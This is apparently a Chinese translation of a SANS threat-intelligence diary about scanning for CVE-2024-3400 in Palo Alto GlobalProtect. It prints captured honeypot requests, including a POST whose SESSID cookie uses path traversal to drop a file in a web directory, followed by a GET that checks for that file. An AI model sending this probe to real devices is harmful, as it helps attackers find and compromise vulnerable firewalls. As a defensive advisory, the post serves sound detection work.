Palo Alto GlobalProtect漏洞扫描激增(CVE-2024-3400)
我们都很清楚安全设备的安全状况令人担忧,无论其价格如何。经常会出现针对某些漏洞的攻击增加,试图清理在早期利用浪潮中遗漏的系统。目前,特定来源141.98.82.26正在寻找利用易受CVE-2024-3400攻击的系统。该漏洞利用相当直接。Palo Alto从未认为有必要验证会话ID。相反,他们直接使用会话ID“原样”创建会话文件。watchTowr[1]很好地解释了这个漏洞。
首先,我们看到一个上传文件的请求:
1
2
3
4
5
6
7
8
9
10
|
POST /ssl-vpn/hipreport.esp
Host: [蜜罐IP]:8080
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/33EGKkp7zRbFyf06zCV4mzq1vDK.txt;
Accept-Encoding: gzip
user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global
|
接下来,一个检索上传文件的请求:
1
2
3
4
5
|
GET /global-protect/portal/images/33KFpJLBHsMmkNuxs7pqpGOIIgF.txt
host: [蜜罐IP]
user-agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
connection: close
accept-encoding: gzip
|
如果文件存在,这将返回“403”错误,如果上传失败则返回“404”错误。它不会执行代码。文件内容是标准的Global Protect会话文件,不会执行。后续攻击会将文件上传到导致代码执行的位置。
同一来源也在攻击我们蜜罐上的“/Synchronization”URL。Google AI将其与上周发现的Global Protect漏洞关联起来,但这似乎是一个幻觉。
[1] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
–
Johannes B. Ullrich, Ph.D., SANS.edu研究院长
Twitter|
关键词:palo alto pan